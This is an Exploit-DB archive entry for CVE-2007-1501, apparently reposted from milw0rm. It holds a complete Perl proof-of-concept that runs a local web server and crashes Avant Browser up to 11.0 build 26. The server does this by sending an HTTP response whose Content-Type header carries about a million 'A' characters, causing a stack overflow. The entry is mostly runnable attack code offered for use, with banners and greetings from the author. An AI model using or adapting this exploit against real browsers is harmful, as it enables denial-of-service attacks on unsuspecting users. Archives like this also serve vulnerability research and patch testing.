Avant Browser <= 11.0 build 26 - Remote Stack Overflow Crash Exploit

2007-03-18T00:00:00
ID EDB-ID:3514
Type exploitdb
Reporter DATA_SNIPER
Modified 2007-03-18T00:00:00

Description

Avant Browser <= 11.0 build 26 Remote Stack Overflow Crash Exploit. CVE-2007-1501. Dos exploit for windows platform

                                        
                                            #!/usr/bin/perl
# Avant Browser (ALL Version) Remot Stack OverFlow (Crash)
# Discovered by DATA_SNIPER
# Usage:
# connect from Avant browser to http://127.0.0.1/
use IO::Socket;
my $sock=new IO::Socket::INET (
Listen    =&gt; 1,
                                
LocalAddr =&gt; 'localhost',
                                
LocalPort =&gt; 80,
                               
Proto     =&gt; 'tcp');
die unless $sock;
$huge="A" x 1034985;
$|=1;
print "==========================================================================\n";
print "        Avant Browser (ALL Version) Remot Stack OverFlow (Crash)
";
print "                 Vulnerability Discovered by DATA_SNIPER
";
print "   GreetZ To:Hacking Master,Dear Devil,Xodia,JASS,All Algerian Hackers \n";
print "               Mail me at:Alpha_3(at)hotmail(dot)com\n";
print "==========================================================================\n";
print"[+] Http server started on port  80... \n";
print"[+] Try To Explorer http://127.0.0.1/ \n";
$z=$sock-&gt;accept();
print"[+] Connection Accepted!\n";
do
{
 $ln=&lt;$z&gt;;
 
print $ln;
 chomp $ln;
 
 if (($ln eq "")||($ln eq "\n")||($ln eq "\r"))
 {
  
print"[&gt;]Sending Evil Packet\n";
  
print $z " HTTP/1.1 200 OK\r\nServer: bugs 3.1.02\r\nContent-Type:$huge\r\nConnection: close\r\n\r\n";
close($z);
  
exit;
 
}
} while (true);

# milw0rm.com [2007-03-18]